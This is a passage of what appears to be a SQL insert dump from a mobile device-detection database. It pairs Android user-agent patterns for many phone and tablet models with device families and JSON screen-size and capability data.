Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; VerykoolSL5550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Viva_H701_LTE_CZ) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Vodacom Power Tab 10) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Vodafone Smart ultra 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Vphone-X3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; WAVE 4.0 II) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; WS055) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; WS067) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; WS50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Wileyfox Swift) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X-TIGI_S1553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X-TIGI_V1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X-treme_PQ24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X-treme_PQ26) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X17) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X2_Soul_Xtreme) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X3 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X3_Soul) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X3_Soul_mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X5S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X5pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X6pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X9 mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X9006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X9009) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X9076) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X9079) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XP7700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1008) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1022) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1023) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1025) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1031) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1033) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1034) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1039) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1045) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1052) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1053) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1058) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1060) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1063) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1068) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1069) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1072) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1078) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1079) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1096) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1097) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1562) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1572) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; XT1580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; X_treme_PQ27) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Y100_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Y14) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Y200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Y538) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; YD201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; YOGA Tablet 2 Pro-1380F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":720,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; YOGA Tablet 2-1050F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; YOGA Tablet 2-1050L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; YOGA Tablet 2-830F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; YOGA Tablet 2-830L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; YQ601) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; YU FLY F8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; YU5010A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z00D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z220) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Z515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 